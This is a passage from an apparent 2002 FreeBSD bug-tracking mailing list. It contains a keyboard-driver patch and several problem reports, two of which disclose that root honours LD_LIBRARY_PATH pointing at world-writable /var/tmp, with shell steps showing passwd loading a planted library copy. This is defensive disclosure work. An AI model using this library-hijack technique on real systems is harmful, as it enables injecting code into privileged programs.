g6UI09WP026807; Tue, 30 Jul 2002 11:00:09 -0700 (PDT) Date: Tue, 30 Jul 2002 11:00:09 -0700 (PDT) Message-Id: <200207301800.g6UI09WP026807@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Yorick Hardy Subject: Re: misc/33965: Programmable keys of the keyboard (Olidata KB-9805) Reply-To: Yorick Hardy Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/33965; it has been noted by GNATS. From: Yorick Hardy To: freebsd-gnats-submit@FreeBSD.org, nivit@libero.it Cc: Subject: Re: misc/33965: Programmable keys of the keyboard (Olidata KB-9805) Date: Sun, 28 Jul 2002 13:58:45 GMT I hope this patch is useful, it incorporates the original suggested patch in a form which is more flexible and adds an ioctl to wait for a function key press so that a program may act on special button presses (eg. volume, play cd etc.). It also supports the Logitech iTouch, Compaq easy internet access and a Microsoft keyboard mentioned on the hackers mailing list. kbdcontrol was also modified to enable the additional functionality. I also have a simplistic daemon and shell script to support volume and cd control when using an appropriate keymap, but that can come later if the patch is worthwhile in its current form. FreeBSD Yorick 4.5-STABLE FreeBSD 4.5-STABLE #1: Sat Jun 8 13:01:09 GMT 2002 root@Yorick:/usr/obj/usr/src/sys/YORICK i386 *** sys/sys/kbio.h.orig Sun Jun 30 15:17:33 2002 --- sys/sys/kbio.h Sat Jul 27 15:59:14 2002 *************** *** 220,225 **** --- 220,235 ---- #define PIO_DEADKEYMAP _IOW('k', 9, accentmap_t) #define GIO_KEYMAPENT _IOWR('k', 10, keyarg_t) #define PIO_KEYMAPENT _IOW('k', 11, keyarg_t) + /* obtain next function key (function number) pressed -- blocking */ + #define WAITFORFKEY _IOR('k', 12, int) + /* set extra keyboard functionality */ + #define SETBUTTONTYPE _IOW('k', 13, int) + + /* extra keyboard functionality (buttons) identification */ + #define ATKBD_NO_EXTRA_BUTTONS 0 + #define ATKBD_LOGITECH_ITOUCH 1 + #define ATKBD_COMPAQ_EASY_ACCESS_INTERNET 2 + #define ATKBD_MICROSOFT 3 + #define ATKBD_OLIDATA_KB9805 4 /* flags set to the return value in the KD_XLATE mode */ *** sys/dev/kbd/atkbd.c.orig Tue Jul 2 10:54:10 2002 --- sys/dev/kbd/atkbd.c Sat Jul 27 16:12:02 2002 *************** *** 185,190 **** --- 185,191 ---- int ks_accents; /* accent key index (> 0) */ u_int ks_composed_char; /* composed char code (> 0) */ u_char ks_prefix; /* AT scan code prefix */ + u_char ks_buttons; /* specify extra button support */ } atkbd_state_t; /* keyboard driver declaration */ *************** *** 252,257 **** --- 253,305 ---- #endif #include + #define ATKBD_MAX_BUTTONS 15 /* the maximum number of extra buttons */ + typedef struct atkbd_button_map { + int size; + unsigned char buttons[ATKBD_MAX_BUTTONS][2]; /* scancode -> keycode */ + } atkbd_button_map_t; + + /* + * The mapping to keycode is as follows + * sleep, suspend -> 0x6c + * mute -> 0x6d + * vol- -> 0x6e + * vol+ -> 0x6f + * play, play/pause -> 0x70 + * stop -> 0x71 + * previous -> 0x72 + * next -> 0x73 + * e-mail -> 0x74 + * search -> 0x75 + * run, launch application -> 0x76 + * home -> 0x77 + * internet -> 0x78 + * e-commerce -> 0x79 + * favourites -> 0x7a + * computer -> 0x7b + * calculator -> 0x7c + * prompt -> 0x7d + * close -> 0x7e + * document -> 0x7f + * screen saver -> 0x80 + * menu -> 0x6b + */ + + #define ATKBD_MAX_BUTTON_TYPE 4 /* the number of button extensions defined */ + static atkbd_button_map_t atkbd_buttons[ATKBD_MAX_BUTTON_TYPE] = { + {0}, /* no buttons */ + /* Logitech iTouch */ + {12, {{0x5f,0x6c},{0x20,0x6d},{0x2e,0x6e}, + {0x30,0x6f},{0x22,0x70},{0x24,0x71}, + {0x10,0x72},{0x19,0x73},{0x6c,0x74}, + {0x65,0x75},{0x66,0x76},{0x32,0x77}}}, + /* Compaq easy internet access */ + {13, {{0x5f,0x6c},{0x20,0x6d},{0x2e,0x6e}, + {0x30,0x6f},{0x22,0x70},{0x24,0x71}, + {0x10,0x72},{0x19,0x73},{0x1e,0x74}, + {0x21,0x75},{0x1f,0x76},{0x23,0x78},{0x32,0x79}}}, + /* Microsoft */ + {10, {{0x5f,0x6c},{0x68,0x71},{0x6a,0x72}, + {0x69,0x73},{0x6c,0x74},{0x65,0x75}, + {0x32,0x77},{0x66,0x7a},{0x6b,0x7b}, + {0x21,0x7c}}}, + /* Olidata KB-9805 */ + {14, {{0x25,0x6c},{0x17,0x6d},{0x1e,0x6e}, + {0x26,0x6f},{0x22,0x70},{0x24,0x71}, + {0x2e,0x72},{0x19,0x73},{0x20,0x78}, + {0x23,0x7d},{0x21,0x7e},{0x32,0x7f}, + {0x12,0x6b},{0x30,0x80}}} + }; + /* structures for the default keyboard */ static keyboard_t default_kbd; static atkbd_state_t default_kbd_state; *************** *** 413,418 **** --- 461,467 ---- } atkbd_clear_state(kbd); state->ks_mode = K_XLATE; + state->ks_buttons = ATKBD_NO_EXTRA_BUTTONS; /* * FIXME: set the initial value for lock keys in ks_state * according to the BIOS data? *************** *** 564,569 **** --- 613,619 ---- u_int action; int scancode; int keycode; + int i; state = (atkbd_state_t *)kbd->kb_data; next_code: *************** *** 681,687 **** case 0x5d: /* menu key */ keycode = 0x6b; break; ! default: /* ignore everything else */ goto next_code; } break; --- 731,744 ---- case 0x5d: /* menu key */ keycode = 0x6b; break; ! default: /* check for extra buttons */ ! for (i = 0; i < atkbd_buttons[state->ks_buttons].size; i++) { ! keycode = atkbd_buttons[state->ks_buttons].buttons[i][1]; ! if (atkbd_buttons[state->ks_buttons].buttons[i][0] == scancode) ! break; ! } ! if (i < atkbd_buttons[state->ks_buttons].size) ! break; goto next_code; } break; *************** *** 914,919 **** --- 971,985 ---- kbd->kb_delay2 = typematic_rate(*(int *)arg); } return error; + + case SETBUTTONTYPE: /* set extra functionality (buttons) */ + if(*(int *)arg >= 0 && *(int *)arg <= ATKBD_MAX_BUTTON_TYPE) + state->ks_buttons = *(int *)arg; + else { + splx(s); + return EINVAL; + } + break; case PIO_KEYMAP: /* set keyboard translation table */ case PIO_KEYMAPENT: /* set keyboard translation table entry */ *** sys/dev/kbd/kbd.c.orig Sun Jun 30 17:48:35 2002 --- sys/dev/kbd/kbd.c Fri Jul 5 15:55:43 2002 *************** *** 140,145 **** --- 140,146 ---- kbd->kb_delay2 = KB_DELAY2; kbd->kb_count = 0L; bzero(kbd->kb_lastact, sizeof(kbd->kb_lastact)); + kbd->kb_lfkey = -1; /* no function key pressed */ } void *************** *** 874,880 **** splx(s); return ENODEV; #endif ! default: splx(s); return ENOIOCTL; --- 875,893 ---- splx(s); return ENODEV; #endif ! case WAITFORFKEY: /* obtain next function key pressed */ ! i = tsleep((caddr_t)&(kbd->kb_lfkey), ! PZERO | PCATCH, "kbdlfk", 0); ! if (i == EINTR) { ! splx(s); ! return EINTR; ! } ! if (!KBD_IS_VALID(kbd)) { ! splx(s); ! return ENXIO; /* our keyboard has gone... */ ! } ! *(int*)arg = kbd->kb_lfkey; ! break; default: splx(s); return ENOIOCTL; *************** *** 1231,1237 **** --- 1244,1254 ---- return ERRKEY; } if (action >= F_FN && action <= L_FN) + { + kbd->kb_lfkey = action-F_FN+1; action |= FKEY; + wakeup(&(kbd->kb_lfkey)); + } /* XXX: return fkey string for the FKEY? */ return (SPCLKEY | action); } *** sys/dev/kbd/kbdreg.h.orig Tue Jul 2 10:52:59 2002 --- sys/dev/kbd/kbdreg.h Sat Jul 27 12:51:32 2002 *************** *** 83,88 **** --- 83,89 ---- struct accentmap *kb_accentmap; /* accent map */ struct fkeytab *kb_fkeytab; /* function key strings */ int kb_fkeytab_size;/* # of function key strings */ + int kb_lfkey; /* the last function key pressed */ void *kb_data; /* the driver's private data */ int kb_delay1; int kb_delay2; *** sys/dev/syscons/syscons.c.orig Wed Jul 3 13:04:14 2002 --- sys/dev/syscons/syscons.c Sat Jul 27 13:22:03 2002 *************** *** 1170,1175 **** --- 1170,1177 ---- case PIO_DEADKEYMAP: /* set accent key translation table */ case GETFKEY: /* get function key string */ case SETFKEY: /* set function key string */ + case WAITFORFKEY: /* next function key pressed */ + case SETBUTTONTYPE: /* specify extra functionality (buttons) */ error = kbd_ioctl(sc->kbd, cmd, data); if (error == ENOIOCTL) error = ENODEV; *** usr.sbin/kbdcontrol/kbdcontrol.c.orig Sat Jul 27 14:12:46 2002 --- usr.sbin/kbdcontrol/kbdcontrol.c Sat Jul 27 16:01:04 2002 *************** *** 88,93 **** --- 88,102 ---- /* 93-96 */ "" , "" , "" , "" , }; + char *atkbd_button_type[] = { + "none", /* ATKBD_NO_EXTRA_BUTTONS */ + "Logitech_iTouch", /* ATKBD_LOGITECH_ITOUCH */ + "Compaq_Easy_Access_Internet", /* ATKBD_COMPAQ_EASY_ACCESS_INTERNET */ + "Microsoft", /* ATKBD_MICROSOFT */ + "Olidata_KB9805", /* ATKBD_OLIDATA_KB9805 */ + NULL + }; + + const int delays[] = {250, 500, 750, 1000}; const int repeats[] = { 34, 38, 42, 46, 50, 55, 59, 63, 68, 76, 84, 92, 100, 110, 118, 126, *************** *** 1054,1059 **** --- 1063,1081 ---- warn("unable to release the keyboard"); } + void + set_buttons(char *opt) + { + int i; + + for (i = 0; atkbd_button_type[i] != NULL; i++) + if (!strcmp(atkbd_button_type[i], opt)) break; + + /* The ioctl will give an error if i is too large anyway */ + if (ioctl(0, SETBUTTONTYPE, &i) == -1) + warn("setting extensions (buttons)"); + } + void usage() *************** *** 1061,1067 **** fprintf(stderr, "%s\n%s\n%s\n", "usage: kbdcontrol [-dFKix] [-b duration.pitch | [quiet.]belltype]", " [-r delay.repeat | speed] [-l mapfile] [-f # string]", ! " [-h size] [-k device] [-L mapfile]"); exit(1); } --- 1083,1089 ---- fprintf(stderr, "%s\n%s\n%s\n", "usage: kbdcontrol [-dFKix] [-b duration.pitch | [quiet.]belltype]", " [-r delay.repeat | speed] [-l mapfile] [-f # string]", ! " [-h size] [-k device] [-L mapfile] [-e extension]"); exit(1); } *************** *** 1071,1077 **** { int opt; ! while((opt = getopt(argc, argv, "b:df:h:iKk:Fl:L:r:x")) != -1) switch(opt) { case 'b': set_bell_values(optarg); --- 1093,1099 ---- { int opt; ! while((opt = getopt(argc, argv, "b:df:h:iKk:Fl:L:r:xe:")) != -1) switch(opt) { case 'b': set_bell_values(optarg); *************** *** 1109,1114 **** --- 1131,1139 ---- break; case 'x': hex = 1; + break; + case 'e': + set_buttons(optarg); break; default: usage(); *** usr.sbin/kbdcontrol/kbdcontrol.1.orig Sat Jul 27 14:15:06 2002 --- usr.sbin/kbdcontrol/kbdcontrol.1 Sat Jul 27 14:41:20 2002 *************** *** 145,150 **** --- 145,161 ---- compiled from it to stdout. This option is primarily intended for programmers and is probably of little use under normal circumstances. + .It Fl e Xo + .Ar extension_type + .Xc + Set the keyboard extension (buttons) type. The currently recognised types are + none + Logitech_iTouch + Compaq_Easy_Access_Internet + Microsoft + Olidata_KB9805 + + Note that an appropriate keymap should be loaded to define the actions of the + extra buttons. .El .Sh KEYBOARD CONFIGURATION .Ss Boot Time Configuration To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 13:40:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1B14637B401 for ; Tue, 30 Jul 2002 13:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5E8D043E5E for ; Tue, 30 Jul 2002 13:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UKe2JU064314 for ; Tue, 30 Jul 2002 13:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UKe2aX064313; Tue, 30 Jul 2002 13:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C9C1D37B400 for ; Tue, 30 Jul 2002 13:36:48 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6E48943E31 for ; Tue, 30 Jul 2002 13:36:48 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UKamOT051792 for ; Tue, 30 Jul 2002 13:36:48 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6UKamu9051791; Tue, 30 Jul 2002 13:36:48 -0700 (PDT) Message-Id: <200207302036.g6UKamu9051791@www.freebsd.org> Date: Tue, 30 Jul 2002 13:36:48 -0700 (PDT) From: Lee Brotherston To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41179: LD_LIBRARY_PATH security checks Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41179 >Category: misc >Synopsis: LD_LIBRARY_PATH security checks >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 13:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Lee Brotherston >Release: FreeBSD 4.6-RC #3 >Organization: >Environment: FreeBSD cybergimp.nerds.org.uk 4.6-RC FreeBSD 4.6-RC #3: Sat Jun 15 21:56:30 BST 2002 lee@cybergimp.nerds.org.uk:/usr/src/sys/compile/NEWGIMPYKERN i386 >Description: LD_LIBRARY_PATH does not perform suitable security checks (in my opinion) when being used by the root user. With this environment variable set root will use alternative shared libraries which it will dynamically load, which is the intended use (I believe). However it does not perform the same basic checks which would be applied when using ldconfig, that being (from ldconfig(8)): "For security reasons, directories which are world or group-writable or which are not owned by root produce warning messages and are skipped, unless the -i option is present." A normal users LD_LIBRARY_PATH will be ignored if it is a setuid binary that is being executed (again from ldconfig(8)): "Special care must be taken when loading shared libraries into the address space of set-user-Id programs. Whenever such a program is run, the dynamic linker will only load shared libraries from the hints file. In particular, the LD_LIBRARY_PATH is not used to search for libraries." So elsewhere in the OS the trend seems to be not to use this varible where malicious code might be run with escalated privilages... However you can use this variable as root, on a setuid binary (ok so you're already root, just mentioning it :>), anywhere.. say /var/tmp, which is owned by nobody and world writable! The scope for inserting a malicious library is quite high there, especially when you consider that when you su (from su(1)) "By default, the environment is unmodified with the exception of USER, HOME, and SHELL.", so you do not even need to get root to set this variable, but some user in wheel that may later su. If you want a full example I can provide one, I'll just leave it out now to keep this short (yeah, that's worked so far). >How-To-Repeat: It's probably easiest just to give this as an example: $ export LD_LIBRARY_PATH="/var/tmp" $ cp /usr/lib/libcrypt.so.2 /var/tmp/libcrypt.so.2 $ chmod 666 /var/tmp/libcrypt.so.2 (you can set pretty much any permissions, ownership, etc you want depending on location) $ su Password: # ldd /usr/bin/passwd /usr/bin/passwd: libcrypt.so.2 => /var/tmp/libcrypt.so.2 (0x2806c000) librpcsvc.so.2 => /usr/lib/librpcsvc.so.2 (0x28085000) libutil.so.3 => /usr/lib/libutil.so.3 (0x2808d000) libc.so.4 => /usr/lib/libc.so.4 (0x28096000) >Fix: I don't have any patch code, but... I would suggest that the same checks are applied when root uses LD_LIBRARY_PATH as when ldconfig is used to generate hints files. That is "directories which are world or group-writable or which are not owned by root produce warning messages and are skipped", or perhaps a simpler (although probably not as elegant) route might be to add LD_LIBRARY_PATH to the list of environment variables which su modifies. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 13:50: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BCE0B37B400 for ; Tue, 30 Jul 2002 13:50:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1395143E42 for ; Tue, 30 Jul 2002 13:50:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UKo1JU065467 for ; Tue, 30 Jul 2002 13:50:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UKo1Vb065466; Tue, 30 Jul 2002 13:50:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6E7E737B400 for ; Tue, 30 Jul 2002 13:46:07 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3176B43E42 for ; Tue, 30 Jul 2002 13:46:07 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UKk7OT052562 for ; Tue, 30 Jul 2002 13:46:07 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6UKk7QA052561; Tue, 30 Jul 2002 13:46:07 -0700 (PDT) Message-Id: <200207302046.g6UKk7QA052561@www.freebsd.org> Date: Tue, 30 Jul 2002 13:46:07 -0700 (PDT) From: Lee Brotherston To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41180: ldconfig man page amendment Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41180 >Category: misc >Synopsis: ldconfig man page amendment >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 13:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Lee Brotherston >Release: FreeBSD 4.6-RC #3 >Organization: >Environment: FreeBSD cybergimp.nerds.org.uk 4.6-RC FreeBSD 4.6-RC #3: Sat Jun 15 21:56:30 BST 2002 lee@cybergimp.nerds.org.uk:/usr/src/sys/compile/NEWGIMPYKERN i386 >Description: The man page for ldconfig(8) says: "Security Special care must be taken when loading shared libraries into the address space of set-user-Id programs. Whenever such a program is run, the dynamic linker will only load shared libraries from the hints file. In particular, the LD_LIBRARY_PATH is not used to search for libraries." This is true for most users, but not for root. I know setuid programs are generally setuid root, and root can do pretty much what it likes, but the man page is not 100% correct. Just wanted to suggest and "unless you are root" type addition to the page ;) >How-To-Repeat: $ su Password: # export LD_LIBRARY_PATH="/var/tmp" # cp /usr/lib/libcrypt.so.2 /var/tmp/ # ldd /usr/bin/passwd /usr/bin/passwd: libcrypt.so.2 => /var/tmp/libcrypt.so.2 (0x2806c000) librpcsvc.so.2 => /usr/lib/librpcsvc.so.2 (0x28085000) libutil.so.3 => /usr/lib/libutil.so.3 (0x2808d000) libc.so.4 => /usr/lib/libc.so.4 (0x28096000) >Fix: Presumably an ammendment to the man page ;) Although I have just raised another problem report (misc/41179: LD_LIBRARY_PATH security checks) as to wether this behaviour is correct or not. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 15:10:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0031737B406 for ; Tue, 30 Jul 2002 15:10:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E915C43E31 for ; Tue, 30 Jul 2002 15:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UMA1JU083432 for ; Tue, 30 Jul 2002 15:10:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UMA1Kr083431; Tue, 30 Jul 2002 15:10:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2401037B400 for ; Tue, 30 Jul 2002 15:05:43 -0700 (PDT) Received: from router.darlow.co.uk (pc2-bigg2-0-cust101.ltn.cable.ntl.com [213.107.35.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5C48843E3B for ; Tue, 30 Jul 2002 15:05:42 -0700 (PDT) (envelope-from neil@router.darlow.co.uk) Received: from router.darlow.co.uk (1001@localhost [127.0.0.1]) by router.darlow.co.uk (8.12.3/8.12.3) with ESMTP id g6UM5fq5038022 for ; Tue, 30 Jul 2002 23:05:41 +0100 (BST) (envelope-from neil@router.darlow.co.uk) Received: (from neil@localhost) by router.darlow.co.uk (8.12.3/8.12.3/Submit) id g6UM5fiO038021; Tue, 30 Jul 2002 23:05:41 +0100 (BST) (envelope-from neil) Message-Id: <200207302205.g6UM5fiO038021@router.darlow.co.uk> Date: Tue, 30 Jul 2002 23:05:41 +0100 (BST) From: Neil Darlow Reply-To: Neil Darlow To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41182: Makefile syntax error? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41182 >Category: bin >Synopsis: Makefile syntax error? >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 15:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Neil Darlow >Release: FreeBSD 4.6-RELEASE-p2 i386 >Organization: Neil Darlow Consulting >Environment: System: FreeBSD router.darlow.co.uk 4.6-RELEASE-p2 FreeBSD 4.6-RELEASE-p2 #0: Sat Jul 13 10:09:56 BST 2002 neil@router.darlow.co.uk:/usr/obj/usr/src/sys/ROUTER i386 >Description: /usr/src/lib/libpam/libpam/Makefile contains a .if that references MAKE_KERBEROS5__ Is this a syntax error? and should it be MAKE_KERBEROS5 as detailed in /etc/defaults/make.conf? >How-To-Repeat: N/A >Fix: Change MAKE_KERBEROS5__ to MAKE_KERBEROS5 ? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 15:20: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7423B37B400 for ; Tue, 30 Jul 2002 15:20:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9764243E5E for ; Tue, 30 Jul 2002 15:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UMK1JU084393 for ; Tue, 30 Jul 2002 15:20:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UMK1Jb084392; Tue, 30 Jul 2002 15:20:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3490937B400 for ; Tue, 30 Jul 2002 15:18:06 -0700 (PDT) Received: from the.oneinsane.net (the.oneinsane.net [66.42.61.25]) by mx1.FreeBSD.org (Postfix) with ESMTP id DD3F643E4A for ; Tue, 30 Jul 2002 15:18:05 -0700 (PDT) (envelope-from blovett@oneinsane.net) Received: by the.oneinsane.net (Postfix, from userid 1011) id 84AB015677; Tue, 30 Jul 2002 15:18:00 -0700 (PDT) Message-Id: <20020730221800.84AB015677@the.oneinsane.net> Date: Tue, 30 Jul 2002 15:18:00 -0700 (PDT) From: Ben Lovett Reply-To: Ben Lovett To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41183: Booting with degraded RAID1 as system disk fails Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41183 >Category: kern >Synopsis: Booting with degraded RAID1 as system disk fails >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 30 15:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Ben Lovett >Release: FreeBSD 4.6-STABLE i386 >Organization: None >Environment: FreeBSD mybox 4.6-STABLE FreeBSD 4.6-STABLE #7: Wed Jul 24 11:29:55 PDT 2002 root@mybox:/usr/obj/usr/src/sys/RAVEL i386 1.5ghz Athlon XP w/512MB RAM on an Abit KG7-RAID board. RAID controller is a Highpoint 370 with two 30GB Seagate hard disks attached. >Description: Any attempt to boot off a RAID1 that has become degraded will fail with a error on attempting to mount the root device. This becomes a problem if the hard disk fails and the system is rebooted either purposfully, or accidentally. If it is rebooted, the array will need to be rebuilt through the controller instead of through atacontrol in userland. >How-To-Repeat: Pull a hard disk that is in a RAID1 and being mounted as the system disk and attempt to boot off the system. >Fix: Unknown at this time. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jul 30 19:10:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 114DF37B400 for ; Tue, 30 Jul 2002 19:10:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 45CEA43E5E for ; Tue, 30 Jul 2002 19:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6V2A3JU024611 for ; Tue, 30 Jul 2002 19:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6V2A3Fi024610; Tue, 30 Jul 2002 19:10:03 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D912137B401 for ; Tue, 30 Jul 2002 19:00:43 -0700 (PDT) Received: from smtp.noos.fr (camus.noos.net [212.198.2.70]) by mx1.FreeBSD.org (Postfix) with ESMTP id B058943E31 for ; Tue, 30 Jul 2002 19:00:42 -0700 (PDT) (envelope-from root@gits.dyndns.org) Received: (qmail 49160778 invoked by uid 0); 31 Jul 2002 02:00:26 -0000 Received: from unknown (HELO gits.gits.dyndns.org) ([212.198.229.153]) (envelope-sender ) by 212.198.2.70 (qmail-ldap-1.03) with SMTP for ; 31 Jul 2002 02:00:26 -0000 Received: from gits.gits.dyndns.org (sh9g6w5ad0ctwn63@localhost [127.0.0.1]) by gits.gits.dyndns.org (8.12.5/8.12.5) with ESMTP id g6V20EJD004789; Wed, 31 Jul 2002 04:00:15 +0200 (CEST) (envelope-from root@gits.dyndns.org) Received: (from root@localhost) by gits.gits.dyndns.org (8.12.5/8.12.5/Submit) id g6V20Dbb004787; Wed, 31 Jul 2002 04:00:13 +0200 (CEST) (envelope-from root) Message-Id: <200207310200.g6V20Dbb004787@gits.gits.dyndns.org> Date: Wed, 31 Jul 2002 04:00:13 +0200 (CEST) From: Cyrille Lefevre Reply-To: Cyrille Lefevre To: FreeBSD-gnats-submit@FreeBSD.org Cc: "Tim J. Robbins" X-Send-Pr-Version: 3.113 Subject: bin/41190: in sed, report the { linenum instead of EOF linenum on pending } Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41190 >Category: bin >Synopsis: in sed, report the { linenum instead of EOF linenum on pending } >Confidential: no >Severity: non-critical >Priority: low >Responsible: 